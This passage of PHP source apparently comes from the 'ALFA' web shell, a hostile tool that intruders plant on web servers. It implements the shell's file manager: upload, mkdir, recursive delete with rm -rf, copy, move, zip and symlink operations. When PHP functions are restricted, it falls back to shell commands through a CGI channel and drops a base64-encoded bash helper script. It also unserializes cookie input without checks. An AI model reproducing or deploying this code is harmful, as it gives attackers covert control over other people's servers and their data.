3406$i .= (($p & 0x0004) ? 'r' : '-');
3407$i .= (($p & 0x0002) ? 'w' : '-');
3408$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
3409return $i;
3410}
3411function alfaPermsColor($f,$isbash=false){
3412$class = "";
3413$num = "";
3414$human = "";
3415if($isbash){
3416$class = $f["class"];
3417$num = $f["num"];
3418$human = $f["human"];
3419}else{
3420$num = substr(sprintf('%o', @fileperms($f)),-4);
3421$human = alfaPerms(@fileperms($f));
3422if(!@is_readable($f))
3423$class = "main_red_perm";
3424elseif (!@is_writable($f))
3425$class = "main_white_perm";
3426else
3427$class = "main_green_perm";
3428}
3429return '<span style="font-weight:unset;" class="'.$class.'">'.$num.'</span><span style="font-weight:unset;" class="beetween_perms"> >> </span><span style="font-weight:unset;" class="'.$class.'">'.$human.'</span>';
3430}
3431if(!function_exists("scandir")) {
3432function scandir($dir) {
3433$dh = opendir($dir);
3434while (false !== ($filename = readdir($dh)))
3435$files[] = $filename;
3436return $files;
3437}
3438}
3439function reArrayFiles($file_post){
3440$file_ary = array();
3441$file_count = count($file_post['name']);
3442$file_keys = array_keys($file_post);
3443for ($i=0; $i<$file_count; $i++) {
3444foreach ($file_keys as $key) {
3445$file_ary[$i][$key] = $file_post[$key][$i];
3446}
3447}
3448return $file_ary;
3449}
3450function _alfa_can_runCommand($cgi=true,$cache=true){
3451 if(isset($_COOKIE["alfa_canruncmd"])&&$cache){
3452 return true;
3453 }
3454 if(strlen(alfaEx("whoami",false,$cgi))>0){
3455 $_COOKIE["alfa_canruncmd"] = true;
3456 return true;
3457 }
3458 return false;
3459}
3460function _alfa_symlink($target, $link){
3461 $phpsym = function_exists("symlink");
3462 if($phpsym){
3463 @symlink($target, $link);
3464 }else{
3465 alfaEx("ln -s '".addslashes($target)."' '".addslashes($link)."'");
3466 }
3467}
3468function _alfa_file_exists($file,$cgi=true){
3469 if(@file_exists($file)){
3470 return true;
3471 }else{
3472 if(strlen(alfaEx("ls -la '".addslashes($file)."'",false,$cgi))>0){
3473 return true;
3474 }
3475 }
3476 return false;
3477}
3478function _alfa_file($file,$cgi=true){
3479 $array = @file($file);
3480 if(!$array){
3481 if(strlen(alfaEx("id",false,$cgi))>0){
3482 $data = alfaEx('cat "'.addslashes($file).'"',false,$cgi);
3483 if(strlen($data)>0){
3484 return explode("\n", $data);
3485 }else{
3486 return false;
3487 }
3488 }else{
3489 return false;
3490 }
3491 }else{
3492 return $array;
3493 }
3494}
3495function _alfa_is_writable($file){
3496 $check = false;
3497 $check = @is_writable($file);
3498 if(!$check){
3499 if(_alfa_can_runCommand()){
3500 $check = alfaEx('[ -w "'.trim(addslashes($file)).'" ] && echo "yes" || echo "no"');
3501 if($check == "yes"){
3502 $check = true;
3503 }else{
3504 $check = false;
3505 }
3506 }
3507 }
3508 return $check;
3509}
3510function _alfa_is_dir($dir,$mode="-d"){
3511 $check = false;
3512 $check = @is_dir($dir);
3513 if($mode == "-e"){
3514 $check = @is_file($dir);
3515 }
3516 if(!$check){
3517 if(_alfa_can_runCommand()){
3518 $check = alfaEx('[ "'.trim($mode).'" "'.trim(addslashes($dir)).'" ] && echo "yes" || echo "no"');
3519 if($check == "yes"){
3520 return true;
3521 }else{
3522 return false;
3523 }
3524 }
3525 }
3526 return $check;
3527}
3528function _alfa_load_ace_options($base){
3529 return '<span>Theme: </span><select class="ace-controler ace-theme-selector" base="'.$base.'" onChange="alfaAceChangeSetting(this,\'theme\');"><option value="terminal" selected>terminal</option><option value="ambiance">ambiance</option><option value="chaos">chaos</option><option value="chrome">chrome</option><option value="clouds">clouds</option><option value="clouds_midnight">clouds_midnight</option><option value="cobalt">cobalt</option><option value="crimson_editor">crimson_editor</option><option value="dawn">dawn</option><option value="dracula">dracula</option><option value="dreamweaver">dreamweaver</option><option value="eclipse">eclipse</option><option value="github">github</option><option value="gob">gob</option><option value="gruvbox">gruvbox</option><option value="idle_fingers">idle_fingers</option><option value="iplastic">iplastic</option><option value="katzenmilch">katzenmilch</option><option value="kr_theme">kr_theme</option><option value="kuroir">kuroir</option><option value="merbivore">merbivore</option><option value="merbivore_soft">merbivore_soft</option><option value="mono_industrial">mono_industrial</option><option value="monokai">monokai</option><option value="nord_dark">nord_dark</option><option value="pastel_on_dark">pastel_on_dark</option><option value="solarized_dark">solarized_dark</option><option value="solarized_light">solarized_light</option><option value="sqlserver">sqlserver</option><option value="textmate">textmate</option><option value="tomorrow">tomorrow</option><option value="tomorrow_night">tomorrow_night</option><option value="tomorrow_night_blue">tomorrow_night_blue</option><option value="tomorrow_night_bright">tomorrow_night_bright</option><option value="tomorrow_night_eighties">tomorrow_night_eighties</option><option value="twilight">twilight</option><option value="vibrant_ink">vibrant_ink</option><option value="xcode">xcode</option></select><span>Language: </span><select class="ace-controler" base="'.$base.'" onChange="alfaAceChangeSetting(this,\'lang\');"><option value="php">php</option><option value="python">python</option><option value="perl">perl</option><option value="c_cpp">c/c++</option><option value="csharp">c#</option><option value="ruby">ruby</option><option value="html">html</option><option value="javascript">javascript</option><option value="css">css</option><option value="xml">xml</option><option value="sql">sql</option><option value="swift">swift</option><option value="sh">bash</option><option value="lua">lua</option><option value="powershell">powershell</option><option value="jsp">jsp</option><option value="java">java</option><option value="json">json</option><option value="plain_text">plain_text</option></select><span>Soft Wrap: </span><input type="checkbox" name="wrapmode" class="ace-controler" onClick="alfaAceChangeWrapMode(this,\''.$base.'\');" checked> | <span>Font Size: </span><button class="ace-controler" style="cursor:pointer;" onclick="alfaAceChangeFontSize(\''.$base.'\',\'+\', this);return false;">+</button> | <button style="cursor:pointer;" class="ace-controler" onclick="alfaAceChangeFontSize(\''.$base.'\', \'-\', this);return false;">-</button> | ';
3530}
3531function alfaFilesMan2(){
3532 alfahead();
3533 AlfaNum(8,9,10,7,6,5,4);
3534 echo '<div style="position:relative;" id="filesman_holder" class="ajaxarea"><div class="header"></div></div>';
3535 alfaFooter();
3536}
3537function copy_paste($c,$s,$d){
3538if(@is_dir($c.$s)){
3539@mkdir($d.$s);
3540$h = @opendir($c.$s);
3541while (($f = @readdir($h)) !== false)
3542if (($f != ".") and ($f != ".."))
3543copy_paste($c.$s.'/',$f, $d.$s.'/');
3544} elseif(is_file($c.$s))
3545@copy($c.$s, $d.$s);
3546}
3547function alfaFilesMan(){
3548if(!empty ($_COOKIE['alfa_f']))
3549$_COOKIE['alfa_f'] = @unserialize($_COOKIE['alfa_f']);
3550if(!empty($_POST['alfa1'])){
3551switch($_POST['alfa1']){
3552case 'uploadFile':
3553$move_cmd_file = false;
3554$alfa_canruncmd = false;
3555if($GLOBALS['glob_chdir_false']){
3556 $alfa_canruncmd = _alfa_can_runCommand(true,true);
3557 $move_cmd_file = true;
3558}
3559if(_alfa_is_writable($GLOBALS['cwd'])){
3560$files = reArrayFiles($_FILES['f']);
3561$ret_files = array();
3562foreach($files as $file){
3563if($move_cmd_file&&$alfa_canruncmd){
3564 alfaEx("cat '".addslashes($file['tmp_name'])."' > '".addslashes($_POST["c"]."/".$file['name'])."'");
3565}else{
3566 if(@move_uploaded_file($file['tmp_name'],$file['name'])){
3567 $ow = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($file['name'])):array("name" => "????");
3568 $gr = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($file['name'])):array("name" => "????");
3569 $file_owner = $ow['name']?$ow['name']:(function_exists("fileowner")?@fileowner($file['name']):"????");
3570 $file_group = $gr['name']?$gr['name']:(function_exists("filegroup")?@filegroup($file['name']):"????");
3571 $file_modify = @date('Y-m-d H:i:s', @filemtime($file['name']));
3572 $file_perm = alfaPermsColor($file['name']);
3573 $file_size = @filesize($file['name']);
3574 $ret_files[] = array("name" => $file['name'], "size" => alfaSize($file_size), "perm" => $file_perm, "modify" => $file_modify, "owner" => $file_owner."/".$file_group);
3575 }
3576}
3577}
3578if(!$move_cmd_file){
3579 echo json_encode($ret_files);
3580}
3581}else{
3582 echo "noperm";
3583 return;
3584}
3585if(!$move_cmd_file){
3586return;
3587}
3588break;
3589case 'mkdir':
3590$new_dir_cmd = false;
3591if($GLOBALS['glob_chdir_false']){
3592 if(_alfa_can_runCommand(true,true)){
3593 if(_alfa_is_writable($GLOBALS['cwd'])){
3594 if(!_alfa_is_dir(trim($_POST['alfa2']))){
3595 alfaEx("cd '".trim(addslashes($_POST['c']))."';mkdir '".trim(addslashes($_POST['alfa2']))."'");
3596 echo "<script>alfaShowNotification('".addslashes($_POST['alfa2'])." created...', 'Files manager');</script>";
3597 }else{
3598 echo "<script>alfaShowNotification('folder already existed', 'Files manager', 'error');</script>";
3599 }
3600 }else{
3601 echo "<script>alfaShowNotification('folder isnt writable !', 'Files manager', 'error');</script>";
3602 }
3603 }else{
3604 echo "<script>alfaShowNotification('Can\'t create new dir !', 'Files manager', 'error');</script>";
3605 }
3606}else{
3607 if(_alfa_is_writable($GLOBALS['cwd'])){
3608 if(!_alfa_is_dir(trim($_POST['alfa2']))){
3609 if(!@mkdir(trim($_POST['alfa2']))){
3610 echo "<script>alfaShowNotification('Can\'t create new dir !', 'Files manager', 'error');</script>";
3611 }else{
3612 echo "<script>alfaShowNotification('".addslashes($_POST['alfa2'])." created...', 'Files manager');</script>";
3613 }
3614 }else{
3615 echo "<script>alfaShowNotification('folder already existed', 'Files manager', 'error');</script>";
3616 }
3617 }else{
3618 echo "<script>alfaShowNotification('folder isnt writable !', 'Files manager', 'error');</script>";
3619 }
3620}
3621break;
3622case 'delete':
3623function deleteDir($path){
3624$path = (substr($path,-1)=='/') ? $path:$path.'/';
3625$dh = @opendir($path);
3626while(($item = @readdir($dh)) !== false){
3627$item = $path.$item;
3628if((basename($item) == "..") || (basename($item) == "."))
3629continue;
3630$type = @filetype($item);
3631if ($type == "dir")
3632deleteDir($item);
3633else
3634@unlink($item);
3635}
3636@closedir($dh);
3637@rmdir($path);
3638}
3639if(is_array(@$_POST['f']))
3640foreach($_POST['f'] as $f){
3641if($f == '..')
3642continue;
3643$f = rawurldecode($f);
3644if($GLOBALS["glob_chdir_false"]){
3645 if(_alfa_can_runCommand(true,true)){
3646 alfaEx("rm -rf '".addslashes($_POST['c'].'/'.$f)."'");
3647 }
3648}else{
3649alfaEx("rm -rf '".addslashes($f)."'",false,false);
3650if(@is_dir($f))
3651deleteDir($f);
3652else
3653@unlink($f);
3654}
3655}
3656if(@is_dir(rawurldecode(@$_POST['alfa2']))&&rawurldecode(@$_POST['alfa2'])!='..'){
3657deleteDir(rawurldecode(@$_POST['alfa2']));
3658alfaEx("rm -rf '".addslashes($_POST['alfa2'])."'",false,false);
3659}else{
3660@unlink(rawurldecode(@$_POST['alfa2']));
3661}
3662if($GLOBALS["glob_chdir_false"]){
3663 $source = rawurldecode(@$_POST['alfa2']);
3664 if($source!='..'&&!empty($source)){
3665 if(_alfa_can_runCommand(true,true)){
3666 alfaEx("cd '".trim(addslashes($_POST['c']))."';rm -rf '".addslashes($source)."'");
3667 }
3668 }
3669}
3670if(is_array($_POST['f']))
3671return;
3672break;
3673case 'paste':
3674if($_COOKIE['alfa_act'] == 'copy'&&isset($_COOKIE['alfa_f'])){
3675foreach($_COOKIE['alfa_f'] as $f)
3676copy_paste($_COOKIE['alfa_c'],$f, $GLOBALS['cwd']);
3677}elseif($_COOKIE['alfa_act'] == 'move'&&isset($_COOKIE['alfa_f'])){
3678function move_paste($c,$s,$d){
3679if(@is_dir($c.$s)){
3680@mkdir($d.$s);
3681$h = @opendir($c.$s);
3682while (($f = @readdir($h)) !== false)
3683if(($f != ".") and ($f != ".."))
3684copy_paste($c.$s.'/',$f, $d.$s.'/');
3685}elseif(@is_file($c.$s))
3686@copy($c.$s, $d.$s);
3687}
3688foreach($_COOKIE['alfa_f'] as $f)
3689@rename($_COOKIE['alfa_c'].$f, $GLOBALS['cwd'].$f);
3690}elseif($_COOKIE['alfa_act'] == 'zip'&&isset($_COOKIE['alfa_f'])){
3691if(class_exists('ZipArchive')){
3692$zip = new ZipArchive();
3693$zipX = "alfa_".rand(1,1000).".zip";
3694if($zip->open($zipX, 1)){
3695@chdir($_COOKIE['alfa_c']);
3696foreach($_COOKIE['alfa_f'] as $f){
3697if($f == '..')continue;
3698if(@is_file($_COOKIE['alfa_c'].$f))
3699$zip->addFile($_COOKIE['alfa_c'].$f, $f);
3700elseif(@is_dir($_COOKIE['alfa_c'].$f)){
3701$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
3702foreach($iterator as $key=>$value){
3703$key = str_replace('\\','/',realpath($key));
3704if(@is_dir($key)){
3705if(in_array(substr($key, strrpos($key,'/')+1),array('.', '..')))continue;
3706}else{$zip->addFile($key,$key);}}}}
3707@chdir($GLOBALS['cwd']);
3708$zip->close();
3709__alert('>> '.$zipX.' << is created...');}}
3710}elseif($_COOKIE['alfa_act'] == 'unzip'&&isset($_COOKIE['alfa_f'])){
3711if(class_exists('ZipArchive')){
3712$zip = new ZipArchive();
3713foreach($_COOKIE['alfa_f'] as $f) {
3714if($zip->open($_COOKIE['alfa_c'].$f)){
3715$zip->extractTo($_COOKIE['alfa_cwd']);
3716$zip->close();}}}}
3717unset($_COOKIE['alfa_f']);
3718break;
3719default:
3720if(!empty($_POST['alfa1'])){
3721if(in_array($_POST['alfa1'], array("copy", "move", "zip", "unzip"))){
3722__alfa_set_cookie('alfa_act', @$_POST['alfa1']);
3723__alfa_set_cookie('alfa_f', @serialize($_POST['f']));
3724__alfa_set_cookie('alfa_c', @$_POST['c']);
3725return;
3726}
3727}
3728break;
3729}
3730}
3731$dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
3732if(preg_match("#(.*)\/\.\.#", $_POST['c'], $res)){
3733 $path = explode('/', $res[1]);
3734 array_pop($path);
3735 $_POST['c'] = implode('/', $path);
3736}
3737$cmd_dir = false;
3738if($dirContent === false){
3739 if(_alfa_can_runCommand(true,true)){
3740 $tmp_getdir_path = @$_COOKIE["alfachdir_bash_path"];
3741 @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
3742 if(!isset($_COOKIE["alfachdir_bash"])||@!file_exists($tmp_getdir_path."/alfacgiapi/getdir.alfa")){
3743 $bash = "jZRbb9owFMefyac4c50GRBGwG1IgD5OmTn3dtIcJUOUmDrGW2MgJStMUae/7lv0ktR0ngYpJ48HYv/+5+HJOrt5ND7mcPjA+zRPn6933AM+du9sfAfY23HNomAhAa+TEQgIDxgEP0xwmBLCyHS0hEg6o354USYA0m2KGnAHjsQjwMC9IAZMQkHvruz9995vv5r77y5+5xHe/IMDab+QMdELP90BSEsFE6vhESlLBarUChHU0FbSo9jTAtVHWs+3RZBYlp7Kjc0t3Uhz2HX2v6CBnT733B00yEbG46thH67unMuOHrOOfTnhyyAjvlM9W4bS871XPM1Df2HAIjAWzpRpXuL7qbI6ajMcw6m/wTZSxus26W/mYMX9+fPnzFxnjSHD6dk9n7uoFYliv1QU3h4EgADSbLxYLBNvtEoqEKptBe1Q004oFTTwUSZWufFSDLNXwKEtlELM28qRUD6OfTweE62vD5Ak7SxKKVMgAZYTx+52klJutqoA0teH+y7VMWEF715xesJE0ai363WJdO+YSIiZpWAhZnSUypaW1ky31PpLuDimRELOUmuM+P182oNm+qP5tllfZg0hZCCnjvy/kN47Ntk3j1RvESUY3yIeN6oINulH/2tSSZqqh6QJL7Vxj0wYW27nGuhUsbaYaNt1gcbvQgi0Sq3SrVjLlciLadSubpzmR7fp445gibj4w9XGLXgE=";
3744 $tmp_getdir_path = alfaWriteTocgiapi("getdir.alfa",$bash);
3745 __alfa_set_cookie("alfachdir_bash", "true");
3746 __alfa_set_cookie("alfachdir_bash_path", $tmp_getdir_path);
3747 }
3748 $dirContent = alfaEx("cd ".$tmp_getdir_path."/alfacgiapi;sh getdir.alfa '".addslashes(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd'])."'");
3749 $dirContent = json_decode($dirContent, true);
3750 if(is_array($dirContent)){
3751 array_pop($dirContent);
3752 $cmd_dir = true;
3753 }else{
3754 $dirContent = false;
3755 }
3756 }
3757}
3758alfahead();
3759AlfaNum(8,9,10,7,6,5,4);
3760$count_dirContent = @count($dirContent);
3761if($count_dirContent > 300){
3762 @$_COOKIE["alfa_limited_files"] = 100;
3763}
3764$alfa_sort_by = isset($_COOKIE["alfa_sort_by"]) ? $_COOKIE["alfa_sort_by"] : 'name';
3765$alfa_limited_files = isset($_COOKIE["alfa_limited_files"]) ? (int)$_COOKIE["alfa_limited_files"] : 0;
3766$alfa_files_page_number = isset($_POST["pagenum"]) ? (int)$_POST["pagenum"] : 1;
3767$alfa_filesman_direction = isset($_COOKIE["alfa_filesman_direction"]) ? $_COOKIE["alfa_filesman_direction"] : 'asc';
3768$files_page_count = 1;
3769if($alfa_limited_files > 0){
3770 $files_page_count = ceil($count_dirContent/$alfa_limited_files);
3771 if($files_page_count > 1){
3772 $files_page_count++;
3773 }
3774}
3775echo '<div class="ajaxarea"><div class="filters-holder"><span>Filter: </span><input style="color:#25ff00;" autocomplete="off" type="text" id="regex-filter" name="name-filter" onkeydown="doFilterName(this);"><span style="margin-left:10px">Sort By: </span><select name="sort_files" onchange="sortBySelectedValue(this,\'alfa_sort_by\');" style="color:#25ff00;"><option value="name" '.($alfa_sort_by == 'name'?'selected':'').'>Name</option><option value="size" '.($alfa_sort_by == 'size'?'selected':'').'>Size</option><option value="modify" '.($alfa_sort_by == 'modify'?'selected':'').'>Modify</option></select><span style="margin-left:10px">Direction: </span><select name="direction_filesman" onChange="sortBySelectedValue(this,\'alfa_filesman_direction\')" style="color:#25ff00;"><option value="asc" '.($alfa_filesman_direction == 'asc'?'selected':'').'>Ascending</option><option value="desc" '.($alfa_filesman_direction == 'desc'?'selected':'').'>Descending</option></select><span style="margin-left:10px;"> limit: </span><input style="text-align:center;width: 40px;color:#25ff00;" type="text" name="limited_number" value="'.$alfa_limited_files.'" oninput="this.value=this.value.replace(/[^0-9]/g,\'\');setCookie(\'alfa_limited_files\', this.value, 2012);"><span style="margin-left:10px;">Files Count: <b style="color:#25ff00;">'.($count_dirContent-1).'</b></span></div><div class="header">';
3776if($dirContent == false){
3777echo '<center><br><span style="font-size:16px;"><span style="color: red; -webkit-text-shadow: 1px 1px 13px;"><strong><b><big>!!! Access Denied !!!</b></big><br><br></strong></div>';
3778alfaFooter();
3779return;
3780}
3781global $sort;
3782$sort = array('name', 1);
3783if(isset($_COOKIE["alfa_sort_by"]) && !empty($_COOKIE["alfa_sort_by"])){
3784 $sort[0] = $_COOKIE["alfa_sort_by"];
3785}
3786if(!empty($_POST['alfa1'])) {
3787if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['alfa1'], $match))
3788$sort = array($match[1], (int)$match[2]);
3789}
3790if($alfa_files_page_number > ($files_page_count-1)){
3791 $alfa_files_page_number = 1;
3792}
3793echo "<form onsubmit='fc(this);return false;' name='files' method='post'><table id='filemanager_table' width='100%' class='main' cellspacing='0' cellpadding='2'><tr><th width='13px'><div class='myCheckbox' style='padding-left:0px;'><input type='checkbox' id='mchk' onclick='checkBox();' class='chkbx'><label for='mchk'></label></div></th><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>";
3794$dirs = $files = array();
3795$n = $count_dirContent;
3796if($n > $alfa_limited_files && $alfa_limited_files > 0){
3797 $n = ($alfa_limited_files * $alfa_files_page_number);
3798 if($n > $count_dirContent){
3799 $n = $count_dirContent;
3800 }
3801}
3802$i = 0;
3803if($alfa_limited_files > 0 && $alfa_files_page_number > 1){
3804 $i = $alfa_limited_files * ($alfa_files_page_number - 1);
3805}
3806$page_builder = get_pagination_links($alfa_files_page_number,$files_page_count -1);
3807for(;$i<$n;$i++){
3808if($cmd_dir){
3809$filename = $dirContent[$i]["name"];
3810$file_owner = $dirContent[$i]["owner"];
3811$file_group = $dirContent[$i]["group"];
3812$file_modify = @date('Y-m-d H:i:s', $dirContent[$i]["modify"]);
3813$file_perm = alfaPermsColor(array("class"=>$dirContent[$i]["permcolor"],"num"=>$dirContent[$i]["permnum"],"human"=>$dirContent[$i]["permhuman"]),true);
3814$file_size = $dirContent[$i]["size"];
3815$file_path = $GLOBALS['cwd']."/".$dirContent[$i]["name"];
3816}else{
3817$filename = $dirContent[$i];
3818$ow = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($GLOBALS['cwd'].$filename)):array("name" => "????");
3819$gr = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($GLOBALS['cwd'].$filename)):array("name" => "????");
3820$file_owner = $ow['name']?$ow['name']:(function_exists("fileowner")?@fileowner($GLOBALS['cwd'].$filename):"????");
3821$file_group = $gr['name']?$gr['name']:(function_exists("filegroup")?@filegroup($GLOBALS['cwd'].$filename):"????");
3822$file_modify = @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $filename));
3823$file_perm = alfaPermsColor($GLOBALS['cwd'].$filename);
3824$file_size = @filesize($GLOBALS['cwd'].$filename);
3825$file_path = $GLOBALS['cwd'].$filename;
3826}
3827$tmp = array('name' => $filename,
3828'path' => $file_path,
3829'modify' => $file_modify,
3830'perms' => $file_perm,
3831'size' => $file_size,
3832'owner' => $file_owner,
3833'group' => $file_group
3834);
3835if($filename == ".."){
3836 $tmp["path"] = str_replace("\\", "/", realpath($file_path));
3837}
3838if(!$cmd_dir){
3839if(@is_file($file_path)){
3840$arr_mrg = array('type' => 'file');
3841if(@is_link($file_path)){
3842$arr_mrg["link"] = readlink($tmp['path']);
3843}
3844$files[] = array_merge($tmp, $arr_mrg);
3845}elseif(@is_link($file_path)){
3846$dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
3847}elseif(@is_dir($file_path)&& ($filename != ".")){
3848$dirs[] = array_merge($tmp, array('type' => 'dir'));
3849}
3850}else{
3851 if($dirContent[$i]["type"]=="file"){
3852 $files[] = array_merge($tmp, array('type' => 'file'));
3853 }else{
3854 if($dirContent[$i]["name"] != "."){
3855 $dirs[] = array_merge($tmp, array('type' => 'dir'));
3856 }
3857 }
3858}
3859}
3860$GLOBALS['sort'] = $sort;
3861function alfaCmp($a, $b) {
3862if($GLOBALS['sort'][0] != 'size')
3863return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
3864else
3865return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
3866}
3867usort($files, "alfaCmp");
3868usort($dirs, "alfaCmp");
3869if(isset($_COOKIE["alfa_filesman_direction"])&& !empty($_COOKIE["alfa_filesman_direction"])){
3870 if($_COOKIE["alfa_filesman_direction"] == 'desc'){
3871 $files = array_reverse($files);
3872 $dirs = array_reverse($dirs);
3873 }
3874}
3875$files = array_merge($dirs, $files);
3876$l=0;
3877$cc=0;
3878foreach($files as $f){
3879$f['name'] = htmlspecialchars($f['name']);
3880$newname = mb_strlen($f['name'], 'UTF-8')>60?mb_substr($f['name'], 0, 60, 'utf-8').'...':$f['name'];
3881$checkbox = 'checkbox'.$cc;
3882$raw_name = rawurlencode($f['name']);
3883$icon = $GLOBALS['DB_NAME']['show_icons']?'<img src="'.findicon($f['name'],$f['type']).'" width="30" height="30">':'';
3884$style = $GLOBALS['DB_NAME']['show_icons']?'position:relative;display:inline-block;bottom:12px;':'';
3885echo '<tr class="fmanager-row" id="tr_row_'.$cc.'"><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="'.$raw_name.'" class="chkbx" id="'.$checkbox .'"><label for="'.$checkbox .'"></label></div></td><td id="td_row_'.$cc.'">'.$icon.'<div style="'.$style.'"><a row="'.$cc.'" id="id_'.$cc.'" class="main_name" onclick="'.(($f['type']=='file')?'editor(\''.$raw_name.'\',\'auto\',\'\',\'\',\'\',\''.$f['type'].'\');" href="#action=fileman&path='.$GLOBALS['cwd'].'&file='.$raw_name.'" fname="'.$raw_name.'" ftype="file" path="'.$GLOBALS['cwd'].'" opt_title="'.$f['link'].'" '.(isset($f['link'])?'onmouseover="showSymlinkPath(this,event);" onmouseout="hideSymlinkPath(this);"':'').'>'.($GLOBALS['cwd'].$f['name']==$GLOBALS['__file_path']?"<span class='shell_name' style='font-weight:unset;'>".$f['name']."</span>":htmlspecialchars($newname)):'g(\'FilesMan\',\''.$f['path'].'\');" href="#action=fileman&path='.$f['path'].'" fname="'.$raw_name.'" ftype="folder" path="'.$GLOBALS['cwd'].'" opt_title="'.$f['link'].'" '.(isset($f['link'])?'onmouseover="showSymlinkPath(this,event);" onmouseout="hideSymlinkPath(this);"':'').'><b>| ' . htmlspecialchars($f['name']) . ' |</b>').'</a></td></div><td><span style="font-weight:unset;" class="main_size">'.(($f['type']=='file')?(isset($f['link'])?'[L] ':'').alfaSize($f['size']):$f['type']).'</span></td><td><span style="font-weight:unset;" class="main_modify">'.$f['modify'].'</span></td><td><span style="font-weight:unset;" class="main_owner_group">'.$f['owner'].'/'.$f['group'].'</span></td><td><a id="id_chmode_'.$cc.'" href=javascript:void(0) onclick="editor(\''.$raw_name.'\',\'chmod\',\'\',\'\',\'\',\''.$f['type'].'\')">'.
3886$f['perms'].'</td><td><a id="id_rename_'.$cc.'" title="Rename" class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'rename\',\'\',\'\',\'\',\''.$f['type'].'\')">R</a> <a id="id_touch_'.$cc.'" title="Modify Datetime" class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'touch\',\'\',\'\',\'\',\''.$f['type'].'\')">T</a>'.(($f['type']=='file')?' <a id="id_edit_'.$cc.'" class="actions" title="Edit" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'edit\',\'\',\'\',\'\',\''.$f['type'].'\')">E</a> <a id="id_download_'.$cc.'" title="Download" class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''.$raw_name.'\', \'download\')">D</a>':'').'<a id="id_delete_'.$cc.'" title="Delete" class="actions" href="javascript:void(0);" onclick="var chk = confirm(\'Are You Sure For Delete # '.addslashes(rawurldecode($f['name'])).' # ?\'); chk ? g(\'FilesMan\',null,\'delete\', \''.$raw_name.'\') : \'\';"> X </a></td></tr>';
3887$l = $l?0:1;
3888$cc++;
3889}
3890echo "<tr id='filemanager_last_tr'><td colspan=7>
3891<input type=hidden name=a value='FilesMan'>
3892<input type=hidden name=c value='".htmlspecialchars(($GLOBALS['glob_chdir_false']?$_POST['c']:$GLOBALS['cwd']))."'>
3893<input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
3894<select id='tools_selector' name='alfa1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete' selected>Delete</option><option value='zip'>Add 2 Compress (zip)</option><option value='unzip'>Add 2 Uncompress (zip)</option><option value='paste'>Paste / Zip / Unzip </option></select>
3895<input type='submit' value=' '>
3896</form></table><div class='pages-holder'><div class='pages-number'>".$page_builder."</div></div></div></div>";
3897alfafooter();
3898}
3899function get_pagination_links($current_page, $total_pages){
3900 $links = "";
3901 if ($total_pages >= 1 && $current_page <= $total_pages) {
3902 $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number\"><<</a>";
3903 $selected_page = "";
3904 if($current_page == 1){
3905 $selected_page = " active-page-number";
3906 }
3907 $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number".$selected_page."\">1</a>";
3908 $i = max(2, $current_page - 5);
3909 if ($i > 2)
3910 $links .= "<a class=\"page-number\">...</a>";
3911 for (; $i < min($current_page + 6, $total_pages); $i++) {
3912 if($i == $current_page){
3913 $selected_page = " active-page-number";
3914 }else{
3915 $selected_page = "";
3916 }
3917 $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number".$selected_page."\">{$i}</a>";
3918 }
3919 if ($i != $total_pages)
3920 $links .= "<a class=\"page-number\">...</a>";
3921 $selected_page = " last-page-number";
3922 if($current_page == $total_pages){
3923 $selected_page .= " active-page-number";
3924 }
3925 $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number".$selected_page."\">{$total_pages}</a>";
3926 $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number\">>></a>";
3927 }
3928 return $links;
3929}
3930function alfaFilesTools(){
3931alfahead();
3932echo '<div class="filestools" style="height: 100%;">';
3933if(isset($_POST['alfa1']))$_POST['alfa1'] = rawurldecode($_POST['alfa1']);
3934$alfa1_decoded = $_POST['alfa1'];
3935$chdir_fals = false;
3936if(!@chdir($_POST['c'])){
3937 $chdir_fals = true;
3938 $_POST['alfa1'] = $_POST["c"]."/".$_POST["alfa1"];
3939 $alfa_canruncmd = _alfa_can_runCommand(true,true);
3940 if($alfa_canruncmd){
3941 $slashed_alfa1 = addslashes($_POST['alfa1']);
3942 $file_info = explode(":", alfaEx('stat -c "%F:%U:%G:%s:%Y:0%a:%A" "'.$slashed_alfa1.'"'));
3943 $perm_color_class = alfaEx("if [[ -w '".$slashed_alfa1."' ]]; then echo main_green_perm; elif [[ -r '".$slashed_alfa1."' ]]; then echo main_white_perm; else echo main_red_perm; fi");
3944 }
3945}
3946if($_POST['alfa2'] == 'auto'){
3947if(is_array(@getimagesize($_POST['alfa1']))){
3948$_POST['alfa2'] = 'image';
3949}else{
3950 $_POST['alfa2'] = 'view';
3951 if($chdir_fals){
3952 if($alfa_canruncmd){
3953 $mime = explode(":", alfaEx("file --mime-type '".addslashes($_POST['alfa1'])."'"));
3954 $mimetype = $mime[1];
3955 if(!empty($mimetype)){
3956 if(strstr($mimetype, "image")){
